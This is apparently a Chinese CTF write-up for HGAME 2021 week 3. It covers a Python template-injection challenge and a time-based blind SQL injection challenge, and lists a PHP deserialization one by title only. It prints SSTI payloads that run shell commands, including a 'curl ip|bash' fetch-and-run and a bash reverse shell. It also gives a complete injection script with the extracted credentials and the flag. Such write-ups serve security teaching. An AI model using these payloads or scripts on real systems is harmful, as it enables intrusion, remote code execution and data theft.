主页 > 网络知识 > HGAME 2021 week3

HGAME 2021 week3

 

HGAME 2021 week3

 

作者:wh1sper@星盟

Level – Week3 Forgetful

考点:简单python-SSTI

 

HGAME 2021 week3

 

题目是一个记事本,添加描述的时候存在SSTI,在查看页面可以看到SSTI已经成功了:

 

HGAME 2021 week3

 

最为常规的payload:

{{[].__class__.__mro__[1].__subclasses__()}} {{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('ls /').read()}} {{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('curl ip|bash').read()}}

因为命令执行处有waf,所以可以选择直接弹shell:

nc -lvnp 8888 bash -i >& /dev/tcp/ip/8888 0>&1

姿势还是比较常规;

分享一个从[].__class__.__mro__[1].__subclasses__()查找模块位置的脚本:

#python 3 import re str = ''' [回显内容] ''' list = re.split(',', str) for i in range(0, len(list)): if 'catch_warnings' in list[i]: print(i) break iki-Jail

考点:MySQL注入,单引号逃逸

熟悉的登录框,熟悉的sql注入

 

HGAME 2021 week3

 

发现用户字段必须要邮箱才可以,而且如果开了Burp抓包之后会出现一些问题,导致Ajax不能工作。

于是直接使用bp对login.php发包;

进行了简单的fuzz,过滤如下:

 

HGAME 2021 week3

 

由单双引号过滤想到了逃逸单引号,当我们用户名输入admin的时候,语句变成了:

SELECT * FROM user WHERE username=http://www.52bug.cn/hkjs/'admin' AND password='xxx'

那么xxx就变成了sql语句执行,造成了注入;

结果发现只能延时注入:

 

HGAME 2021 week3

 

exp:

#python3,wh1sper import requests import time host = 'https://jailbreak.liki.link/login.php' def mid(bot, top): return (int)(0.5*(top+bot)) def transToHex(flag): res = '' for i in flag: res += hex(ord(i)) res = '0x' + res.replace('0x', '') return res def sqli(): name = '' for j in range(1, 200): top = 126 bot = 32 while top > bot: babyselect = '(database())'#week3sqli babyselect = "(select group_concat(table_name) from information_schema.TABLES where table_schema like database())"#u5ers babyselect = "(select group_concat(column_name) from information_schema.columns where table_name like 0x7535657273)"#usern@me,p@ssword babyselect = "(select `p@ssword` from week3sqli.u5ers)"#sOme7hiNgseCretw4sHidd3n babyselect = "(select `usern@me` from week3sqli.u5ers)"#admin payload = "^(if((ascii(substr({},{},1))>{}),1,sleep(2)))#".format(babyselect, j, mid(bot, top)) data = { "username": "admin\", "password": payload.replace(' ', '/**/') #^(if((ascii(1)>55),sleep(3),sleep(3)))#这个确实延时成功了 } try: start = time.time() r = requests.post(url=host, data=data) print(data) print(time.time()-start) if time.time()-start < 1.5: bot = mid(bot, top) + 1 else: top = mid(bot, top) except: continue name += chr(top) print(name) if __name__ == '__main__': sqli() #hgame{7imeB4se_injeCti0n+hiDe~th3^5ecRets}

hgame{7imeB4se_injeCti0n+hiDe~th3^5ecRets}

Arknights

考点:PHP反序列化

提取码请登录后查看!
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!